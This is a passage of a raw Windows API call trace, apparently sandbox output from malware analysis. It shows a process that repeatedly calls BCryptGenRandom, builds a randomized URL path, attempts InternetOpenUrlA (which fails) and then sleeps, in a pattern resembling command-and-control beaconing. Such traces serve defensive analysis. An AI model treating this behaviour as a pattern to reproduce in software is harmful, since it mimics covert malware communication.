pbBuffer=0x46ffd5d) returned 0x0 [0221.336] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a017ee, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x3a017ee) returned 0x0 [0221.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.344] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.345] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.346] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.346] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.347] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.347] GetProcessHeap () returned 0x440000 [0221.347] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4724e0 [0221.347] lstrcpyA (in: lpString1=0x4724e0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0221.347] lstrcatA (in: lpString1="\x04", lpString2="/57ebjScxojtlNTnxdleFD8bSqT3os4nlBWuamIo9o/oQ2qbI1vqebb89x36u1qveP61y/bulzq0hszqkp2xxgR06oi4Zct6rqRdjba5Ldgurnt54mq/Dvguelhc9n8zN9tt9dmi89ibmzt15zmdnr6DdpWik/a2xxsnpmh8kjilX2ogDNyXiHyoh8Ihpzs7mmlo7mz8c36t/" | out: lpString1="\x04/57ebjScxojtlNTnxdleFD8bSqT3os4nlBWuamIo9o/oQ2qbI1vqebb89x36u1qveP61y/bulzq0hszqkp2xxgR06oi4Zct6rqRdjba5Ldgurnt54mq/Dvguelhc9n8zN9tt9dmi89ibmzt15zmdnr6DdpWik/a2xxsnpmh8kjilX2ogDNyXiHyoh8Ihpzs7mmlo7mz8c36t/") returned="\x04/57ebjScxojtlNTnxdleFD8bSqT3os4nlBWuamIo9o/oQ2qbI1vqebb89x36u1qveP61y/bulzq0hszqkp2xxgR06oi4Zct6rqRdjba5Ldgurnt54mq/Dvguelhc9n8zN9tt9dmi89ibmzt15zmdnr6DdpWik/a2xxsnpmh8kjilX2ogDNyXiHyoh8Ihpzs7mmlo7mz8c36t/" [0221.347] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0221.347] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/57ebjScxojtlNTnxdleFD8bSqT3os4nlBWuamIo9o/oQ2qbI1vqebb89x36u1qveP61y/bulzq0hszqkp2xxgR06oi4Zct6rqRdjba5Ldgurnt54mq/Dvguelhc9n8zN9tt9dmi89ibmzt15zmdnr6DdpWik/a2xxsnpmh8kjilX2ogDNyXiHyoh8Ihpzs7mmlo7mz8c36t/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0221.347] GetProcessHeap () returned 0x440000 [0221.347] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4724e0 | out: hHeap=0x440000) returned 1 [0221.348] GetProcessHeap () returned 0x440000 [0221.348] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a01750 | out: hHeap=0x440000) returned 1 [0221.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0221.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0221.348] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0221.348] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0221.349] Sleep (dwMilliseconds=0x19edf) [0221.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0221.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.699] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.699] GetProcessHeap () returned 0x440000 [0221.699] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0221.699] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0221.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.700] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.700] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.701] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.701] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.702] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.703] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.704] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.704] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26d, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1b26d) returned 0x0 [0221.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.705] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.705] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.706] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.707] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.708] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.708] BCryptGenRandom (in: hAlgorithm=0x0, 